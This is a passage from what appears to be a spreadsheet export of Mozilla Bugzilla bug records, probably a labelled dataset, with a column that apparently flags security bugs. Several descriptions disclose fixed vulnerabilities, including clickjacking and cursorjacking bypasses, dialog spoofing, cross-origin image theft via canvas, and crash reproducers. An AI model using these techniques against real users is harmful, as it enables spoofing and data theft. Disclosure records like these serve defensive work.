&lt;select&gt;Test: &lt;option&gt;foo&lt;/option&gt;&lt;option&gt;bar&lt;/option&gt;&lt;/select&gt;
Open then select one of the options, the console will have
JavaScript error: resource:///modules/CustomizableUI.jsm, line 4272: TypeError: doc.defaultView.updateEditUIVisibility is not a function
Selection otherwise seems to work.</t>
        </is>
      </c>
      <c r="X3692" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3693">
      <c r="A3693" t="n">
        <v>283567</v>
      </c>
      <c r="B3693" t="inlineStr">
        <is>
          <t>2005-02-24 23:45:23 -0800</t>
        </is>
      </c>
      <c r="C3693" t="inlineStr">
        <is>
          <t>Toggling a comment's privacy does nothing</t>
        </is>
      </c>
      <c r="D3693" t="inlineStr">
        <is>
          <t>2005-02-28 13:33:53 -0800</t>
        </is>
      </c>
      <c r="E3693" t="n">
        <v>1</v>
      </c>
      <c r="F3693" t="n">
        <v>1</v>
      </c>
      <c r="G3693" t="n">
        <v>4</v>
      </c>
      <c r="H3693" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3693" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3693" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K3693" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L3693" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3693" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3693" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3693" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3693" t="inlineStr"/>
      <c r="Q3693" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3693" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3693" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T3693" t="n">
        <v>1</v>
      </c>
      <c r="U3693" t="n">
        <v>0</v>
      </c>
      <c r="V3693" t="n">
        <v>8</v>
      </c>
      <c r="W3693" t="inlineStr">
        <is>
          <t>On today's tip, if I uncheck the "private" box on a comment, it doesn't become
un-private. If I check the "private" box, it doesn't become private.
I can file a new private comment, or make a new private attachment, but once
something is private I can't make it "un-private." Once something is
"un-private", I can't make it private.</t>
        </is>
      </c>
      <c r="X3693" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3694">
      <c r="A3694" t="n">
        <v>426520</v>
      </c>
      <c r="B3694" t="inlineStr">
        <is>
          <t>2008-04-02 07:39:53 -0700</t>
        </is>
      </c>
      <c r="C3694" t="inlineStr">
        <is>
          <t>crash [@ ParseXMLSource / jsxml.c:1978]</t>
        </is>
      </c>
      <c r="D3694" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:46 -0700</t>
        </is>
      </c>
      <c r="E3694" t="n">
        <v>1</v>
      </c>
      <c r="F3694" t="n">
        <v>1</v>
      </c>
      <c r="G3694" t="n">
        <v>3</v>
      </c>
      <c r="H3694" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3694" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3694" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3694" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3694" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3694" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3694" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3694" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3694" t="inlineStr">
        <is>
          <t>[sg:critical] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q3694" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3694" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3694" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T3694" t="n">
        <v>1</v>
      </c>
      <c r="U3694" t="n">
        <v>0</v>
      </c>
      <c r="V3694" t="n">
        <v>27</v>
      </c>
      <c r="W3694" t="inlineStr">
        <is>
          <t>I'm running nightly of Firefox wit Jesse's JS fuzzer and Firefox is repeatably crashing in ParseXMLSource. I'm running fuzzer in browser, so I can't provide exact crashing testcase, but Firefox crash every time in few minutes.
Used JS fuzzer version:
https://bugzilla.mozilla.org/attachment.cgi?id=240710
in HTML wrapper.
Signature	ParseXMLSource	
UUID		311476e1-00b4-11dd-b302-001a4bd43ef6	
Time		2008-04-02 05:56:09-07:00	
Uptime		1692	
Product		Firefox	
Version		3.0pre	
Build ID	2008040112	
OS		Windows NT	
OS Version	5.1.2600 Service Pack 2
CPU		x86	
CPU Info	GenuineIntel family 6 model 14 stepping 8
Crash Reason	EXCEPTION_ACCESS_VIOLATION
Crash Address	0x0
Some reports:
http://crash-stats.mozilla.com/report/index/21e5f14c-00b6-11dd-ab47-001a4bd43ef6
http://crash-stats.mozilla.com/report/index/7d973863-00b5-11dd-9cde-001a4bd43e5c
http://crash-stats.mozilla.com/report/index/f3a062b5-00b4-11dd-8dfd-001a4bd43e5c
http://crash-stats.mozilla.com/report/index/311476e1-00b4-11dd-b302-001a4bd43ef6
http://crash-stats.mozilla.com/report/index/8e43ff21-00b4-11dd-b784-001a4bd43e5c
http://crash-stats.mozilla.com/report/index/47f6af38-00b4-11dd-8b99-001a4bd43e5c
http://crash-stats.mozilla.com/report/index/f5bfa15e-00b6-11dd-9513-001a4bd43ef6
http://crash-stats.mozilla.com/report/index/e1cf3e47-00b6-11dd-980e-001a4bd43ef6</t>
        </is>
      </c>
      <c r="X3694" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3695">
      <c r="A3695" t="n">
        <v>785358</v>
      </c>
      <c r="B3695" t="inlineStr">
        <is>
          <t>2012-08-24 04:36:40 -0700</t>
        </is>
      </c>
      <c r="C3695" t="inlineStr">
        <is>
          <t>Assertion failure: fe-&gt;isType(type), at methodjit/Compiler.cpp:7623</t>
        </is>
      </c>
      <c r="D3695" t="inlineStr">
        <is>
          <t>2013-04-30 18:40:14 -0700</t>
        </is>
      </c>
      <c r="E3695" t="n">
        <v>1</v>
      </c>
      <c r="F3695" t="n">
        <v>1</v>
      </c>
      <c r="G3695" t="n">
        <v>3</v>
      </c>
      <c r="H3695" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3695" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3695" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3695" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3695" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3695" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3695" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3695" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3695" t="inlineStr">
        <is>
          <t>[jsbugmon:verify-branch=mozilla-esr17,ignore][adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q3695" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3695" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3695" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T3695" t="n">
        <v>1</v>
      </c>
      <c r="U3695" t="n">
        <v>0</v>
      </c>
      <c r="V3695" t="n">
        <v>17</v>
      </c>
      <c r="W3695" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision ad7963c93bd8 (options -m -a -n):
try {
a = []
function f(o) {
    o[5] = {}
}
    with(a) f()
} catch(exc1) {}
evaluate("f({});");</t>
        </is>
      </c>
      <c r="X3695" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3696">
      <c r="A3696" t="n">
        <v>399654</v>
      </c>
      <c r="B3696" t="inlineStr">
        <is>
          <t>2007-10-12 16:47:07 -0700</t>
        </is>
      </c>
      <c r="C3696" t="inlineStr">
        <is>
          <t>Entering a bug with strict_isolation turned on fails due to an incorrect argument passed to can_see_product()</t>
        </is>
      </c>
      <c r="D3696" t="inlineStr">
        <is>
          <t>2008-01-02 13:32:44 -0800</t>
        </is>
      </c>
      <c r="E3696" t="n">
        <v>1</v>
      </c>
      <c r="F3696" t="n">
        <v>1</v>
      </c>
      <c r="G3696" t="n">
        <v>4</v>
      </c>
      <c r="H3696" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3696" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3696" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K3696" t="inlineStr">
        <is>
          <t>3.1.2</t>
        </is>
      </c>
      <c r="L3696" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3696" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3696" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3696" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3696" t="inlineStr"/>
      <c r="Q3696" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3696" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3696" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T3696" t="n">
        <v>1</v>
      </c>
      <c r="U3696" t="n">
        <v>0</v>
      </c>
      <c r="V3696" t="n">
        <v>10</v>
      </c>
      <c r="W3696" t="inlineStr">
        <is>
          <t>I have this situation:
  bob is in the group "everythingsolved"
  everything solved is a member of the "nasa" group
  The "NASA" product is Mandatory/Mandatory/ENTRY for the "nasa" group.
  There is no "canedit" set anywhere. (Also note that "everythingsolved" is a member of "editbugs", so bob has editbugs.)
  When I enter a bug and try to make bob the assignee or QA contact, I get an error saying that bob can't edit the product and so can't be the assignee of the bug.</t>
        </is>
      </c>
      <c r="X3696" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3697">
      <c r="A3697" t="n">
        <v>1699835</v>
      </c>
      <c r="B3697" t="inlineStr">
        <is>
          <t>2021-03-19 14:49:43 -0700</t>
        </is>
      </c>
      <c r="C3697" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free [@ EntryCount] using toggle responsive design mode (ctrl+shift+m)</t>
        </is>
      </c>
      <c r="D3697" t="inlineStr">
        <is>
          <t>2024-05-30 10:29:09 -0700</t>
        </is>
      </c>
      <c r="E3697" t="n">
        <v>1</v>
      </c>
      <c r="F3697" t="n">
        <v>1</v>
      </c>
      <c r="G3697" t="n">
        <v>3</v>
      </c>
      <c r="H3697" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3697" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3697" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K3697" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3697" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3697" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3697" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3697" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3697" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey][adv-main88+][adv-esr78.10+]</t>
        </is>
      </c>
      <c r="Q3697" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3697" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3697" t="inlineStr">
        <is>
          <t>89 Branch</t>
        </is>
      </c>
      <c r="T3697" t="n">
        <v>1</v>
      </c>
      <c r="U3697" t="n">
        <v>0</v>
      </c>
      <c r="V3697" t="n">
        <v>21</v>
      </c>
      <c r="W3697" t="inlineStr">
        <is>
          <t>Created attachment 9210438
testcase.html
After visit the testcase, when toggling the responsive design mode, the tab crashed with summary: `AddressSanitizer: heap-use-after-free /builds/worker/workspace/obj-build/dist/include/PLDHashTable.h:434:40 in EntryCount`. 
## Affected version:
- Firefox Nightly 88.0a1 (2021-03-19) (64-bit)
- Firefox Release 86.0.1 (64-bit)
- Firefox ESR 78.8.0esr (64-bit)
## Steps to Reproduce:
1. Visit attached testcase.html
2. Press `Ctrl` + `Shift` + `M` to switch to Responsive Design Mode 
3. After ~5 seconds the page will reload itself
4. After the page reload, press `Ctrl` + `Shift` + `M` to exit the Responsive Design Mode 
5. The tab crashed</t>
        </is>
      </c>
      <c r="X3697" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3698">
      <c r="A3698" t="n">
        <v>995603</v>
      </c>
      <c r="B3698" t="inlineStr">
        <is>
          <t>2014-04-12 06:40:15 -0700</t>
        </is>
      </c>
      <c r="C3698" t="inlineStr">
        <is>
          <t>Cursor can be totally invisible using flash object and div</t>
        </is>
      </c>
      <c r="D3698" t="inlineStr">
        <is>
          <t>2024-05-30 08:33:56 -0700</t>
        </is>
      </c>
      <c r="E3698" t="n">
        <v>1</v>
      </c>
      <c r="F3698" t="n">
        <v>1</v>
      </c>
      <c r="G3698" t="n">
        <v>6</v>
      </c>
      <c r="H3698" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3698" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J3698" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K3698" t="inlineStr">
        <is>
          <t>28 Branch</t>
        </is>
      </c>
      <c r="L3698" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3698" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3698" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3698" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3698" t="inlineStr">
        <is>
          <t>[description in comment #17][adv-main30+]</t>
        </is>
      </c>
      <c r="Q3698" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3698" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3698" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T3698" t="n">
        <v>1</v>
      </c>
      <c r="U3698" t="n">
        <v>0</v>
      </c>
      <c r="V3698" t="n">
        <v>79</v>
      </c>
      <c r="W3698" t="inlineStr">
        <is>
          <t>Created attachment 8405757
test INVISIBLE MOUSE.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:28.0) Gecko/20100101 Firefox/28.0 (Beta/Release)
Build ID: 20140314220517
Steps to reproduce:
firstly i would to say that it's not a flash issue and it's works only for firefox for mac os x (don't works on WINDOWS , don't works on Google Chrome , don't works on Opera, don't works on safari).
when you go on a flash object that defined the cursor like unvisible and you go on a &lt;div&gt; with the cursor , the cursor is totaly unvisible (don't works on WINDOWS , don't works on Google Chrome , don't works on Opera, don't works on safari).
This can lead to clickjacking , cursorjacking , spoofing or others...
steps:
1 : go to the flash object (in center into the flash object) 
2 : wait 2 s 
3 : go with your cursor down (div t2)
4 : Cursor are cursor-jacked 
(view this youtube video for more details =&gt; https://www.youtube.com/watch?v=5Lu8pcWvUVY&amp;feature=youtu.be  )
Actual results:
Cursor are totaly unsibile , when you try to install a xpi , the cursor is totally unvisible.
Expected results:
this can be used for clickjacking / cursorjacking  / spoofing or others , 
this issue works only on Firefox for MAC .</t>
        </is>
      </c>
      <c r="X3698" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3699">
      <c r="A3699" t="n">
        <v>1366818</v>
      </c>
      <c r="B3699" t="inlineStr">
        <is>
          <t>2017-05-22 09:36:12 -0700</t>
        </is>
      </c>
      <c r="C3699" t="inlineStr">
        <is>
          <t>Spoofing dialog and don't exit fullscreen mode</t>
        </is>
      </c>
      <c r="D3699" t="inlineStr">
        <is>
          <t>2024-06-11 03:13:29 -0700</t>
        </is>
      </c>
      <c r="E3699" t="n">
        <v>1</v>
      </c>
      <c r="F3699" t="n">
        <v>1</v>
      </c>
      <c r="G3699" t="n">
        <v>3</v>
      </c>
      <c r="H3699" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3699" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3699" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3699" t="inlineStr">
        <is>
          <t>54 Branch</t>
        </is>
      </c>
      <c r="L3699" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3699" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3699" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3699" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3699" t="inlineStr">
        <is>
          <t>[adv-main94+][adv-esr91.3+]</t>
        </is>
      </c>
      <c r="Q3699" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3699" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3699" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T3699" t="n">
        <v>1</v>
      </c>
      <c r="U3699" t="n">
        <v>0</v>
      </c>
      <c r="V3699" t="n">
        <v>78</v>
      </c>
      <c r="W3699" t="inlineStr">
        <is>
          <t>Created attachment 8870073
dialog.jpg
User Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Steps to reproduce:
Open Poc
1.spoof.html.(Fake Message Box)
2.spoof2.html (Spoofing Notification window)
3.fullscreen.html (Don't exit fullscreen mode)
Actual results:
SetCustomValidity method displays a message on top of all Windows, under certain circumstances, this may lead to the substitution of the message browser</t>
        </is>
      </c>
      <c r="X3699" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3700">
      <c r="A3700" t="n">
        <v>634444</v>
      </c>
      <c r="B3700" t="inlineStr">
        <is>
          <t>2011-02-15 15:46:23 -0800</t>
        </is>
      </c>
      <c r="C3700" t="inlineStr">
        <is>
          <t>Long lines with many warnings from javascript.options.strict cause memory spikes when a console or Firebug is in use</t>
        </is>
      </c>
      <c r="D3700" t="inlineStr">
        <is>
          <t>2013-12-27 14:25:19 -0800</t>
        </is>
      </c>
      <c r="E3700" t="n">
        <v>1</v>
      </c>
      <c r="F3700" t="n">
        <v>1</v>
      </c>
      <c r="G3700" t="n">
        <v>3</v>
      </c>
      <c r="H3700" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3700" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3700" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3700" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3700" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3700" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3700" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3700" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3700" t="inlineStr">
        <is>
          <t>[mlk][has patch][mozmill-endurance][MemShrink:P3] [advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q3700" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3700" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3700" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T3700" t="n">
        <v>1</v>
      </c>
      <c r="U3700" t="n">
        <v>1</v>
      </c>
      <c r="V3700" t="n">
        <v>50</v>
      </c>
      <c r="W3700" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b12pre) Gecko/20110209 Firefox/4.0b12pre ID:20110209030359
We run into a huge memory leak which can also freeze the system, just by performing the following steps:
1. Create a fresh profile and stick the attached users.js file into it
2. Install the latest alpha version of Firebug 1.7 (http://getfirebug.com/releases/firebug/1.7X/firebug-1.7X.0a10.xpi)
3. Open the given URL
Within seconds the memory will be filled-up completely and the system can freeze.  
This is a regression and happened between Beta 7 and Beta 8. I will nail down the regression range tomorrow morning.</t>
        </is>
      </c>
      <c r="X3700" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3701">
      <c r="A3701" t="n">
        <v>1296087</v>
      </c>
      <c r="B3701" t="inlineStr">
        <is>
          <t>2016-08-17 13:52:11 -0700</t>
        </is>
      </c>
      <c r="C3701" t="inlineStr">
        <is>
          <t>IonCache getter stub may not correctly restore clobbered register</t>
        </is>
      </c>
      <c r="D3701" t="inlineStr">
        <is>
          <t>2017-08-28 13:30:24 -0700</t>
        </is>
      </c>
      <c r="E3701" t="n">
        <v>1</v>
      </c>
      <c r="F3701" t="n">
        <v>1</v>
      </c>
      <c r="G3701" t="n">
        <v>3</v>
      </c>
      <c r="H3701" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3701" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3701" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3701" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3701" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3701" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3701" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3701" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3701" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main49+]</t>
        </is>
      </c>
      <c r="Q3701" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3701" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3701" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T3701" t="n">
        <v>1</v>
      </c>
      <c r="U3701" t="n">
        <v>0</v>
      </c>
      <c r="V3701" t="n">
        <v>20</v>
      </c>
      <c r="W3701" t="inlineStr">
        <is>
          <t>Created attachment 8782135
incomplete_test_case.js
There's a single typo in IonCaches.cpp that means that the object (receiver) register may be left overwritten with another object or group's memory address, with the previous value left in the stack. The circumstances required to trigger this are somewhat specific:
1. A GenerateCallGetter stub must be generated in Ion code.
2. The GenerateCallGetter stub has to be using the same register for both receiver object and scratch. Since all callers pass in the output register as scratch, this means that the receiver and output register must be the same.
3. GeneratePrototypeGuards must generate at least one prototype guard. This means that at least one object from the receiver up to (but not including) the holder must have the UNCACHEABLE_PROTO flag set. This only happens for non-singleton objects who either have had their prototype mutated in the past or were part of a prototype chain in which a downstream object's prototype was mutated.
4. The prototype of that object must be mutated after the cache stub has been generated. The next time the cache stub is used, the previously-generated guard from GeneratePrototypeGuards will fail. The problem: execution will then jump to the next stub without restoring the clobbered object register or fixing the stack.
The code is definitely incorrect, but I haven't been able to manually trigger condition (1). If I edit IonCaches.cpp to directly use the object register as scratch, the issue described above occurs. The tricky part is setting up the code so that the register allocator will reuse the receiver register as the output register. Two previous attempts at patching this area of the code demonstrate that this *can* happen (https://bugzilla.mozilla.org/show_bug.cgi?id=1033873 and https://bugzilla.mozilla.org/show_bug.cgi?id=1046597), but both of their test cases trigger it through the global object's __proto__ property. Both the global object and its prototype are singletons, and both have immutable prototypes, so they can't be used to set up the UNCACHEABLE_PROTO flag as described in condition (3).
If it *is* possible to trigger this in the real world, or if the fragile set of circumstances potentially preventing it from being triggered changes, the result (user code corrupting the stack and replacing a memory address held in a register) sounds pretty bad, so I'm marking this as security-sensitive. Fortunately the patch is trivial.</t>
        </is>
      </c>
      <c r="X3701" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3702">
      <c r="A3702" t="n">
        <v>1839073</v>
      </c>
      <c r="B3702" t="inlineStr">
        <is>
          <t>2023-06-18 08:24:41 -0700</t>
        </is>
      </c>
      <c r="C3702" t="inlineStr">
        <is>
          <t>Bypass site permission clickjacking protections on Desktop by opening a new tab with window.open() and closing it after the permission timeout has expired</t>
        </is>
      </c>
      <c r="D3702" t="inlineStr">
        <is>
          <t>2024-06-02 18:07:00 -0700</t>
        </is>
      </c>
      <c r="E3702" t="n">
        <v>1</v>
      </c>
      <c r="F3702" t="n">
        <v>1</v>
      </c>
      <c r="G3702" t="n">
        <v>3</v>
      </c>
      <c r="H3702" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3702" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3702" t="inlineStr">
        <is>
          <t>PopupNotifications and Notification Bars</t>
        </is>
      </c>
      <c r="K3702" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3702" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3702" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3702" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3702" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3702" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main116+] [adv-ESR115.1+] [adv-ESR102.14+]</t>
        </is>
      </c>
      <c r="Q3702" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3702" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3702" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T3702" t="n">
        <v>1</v>
      </c>
      <c r="U3702" t="n">
        <v>0</v>
      </c>
      <c r="V3702" t="n">
        <v>48</v>
      </c>
      <c r="W3702" t="inlineStr">
        <is>
          <t>By opening a new window maintaining it for 500ms and closing it, it bypasses clickjacking protections.
1. Go to https://haxatron1-bugs.glitch.me/clickjack.html and spam click on button</t>
        </is>
      </c>
      <c r="X3702" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3703">
      <c r="A3703" t="n">
        <v>355126</v>
      </c>
      <c r="B3703" t="inlineStr">
        <is>
          <t>2006-10-02 06:28:02 -0700</t>
        </is>
      </c>
      <c r="C3703" t="inlineStr">
        <is>
          <t>stealing pictures via canvas and http redirect</t>
        </is>
      </c>
      <c r="D3703" t="inlineStr">
        <is>
          <t>2020-10-25 11:07:36 -0700</t>
        </is>
      </c>
      <c r="E3703" t="n">
        <v>1</v>
      </c>
      <c r="F3703" t="n">
        <v>1</v>
      </c>
      <c r="G3703" t="n">
        <v>3</v>
      </c>
      <c r="H3703" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3703" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3703" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K3703" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L3703" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3703" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3703" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3703" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3703" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q3703" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3703" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3703" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3703" t="n">
        <v>1</v>
      </c>
      <c r="U3703" t="n">
        <v>0</v>
      </c>
      <c r="V3703" t="n">
        <v>82</v>
      </c>
      <c r="W3703" t="inlineStr">
        <is>
          <t>stealing pictures via canvas and http redirect
using a canvases, drawImage, toDataURL and an image that is redirected 
via the http protocolit is possible to get the content of arbitrary 
accessible http images.
affects both trunk and 2.0 branch.
testcase to follow.</t>
        </is>
      </c>
      <c r="X3703" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3704">
      <c r="A3704" t="n">
        <v>748633</v>
      </c>
      <c r="B3704" t="inlineStr">
        <is>
          <t>2012-04-24 19:08:44 -0700</t>
        </is>
      </c>
      <c r="C3704" t="inlineStr">
        <is>
          <t>Thunderbird try logs failing to upload</t>
        </is>
      </c>
      <c r="D3704" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
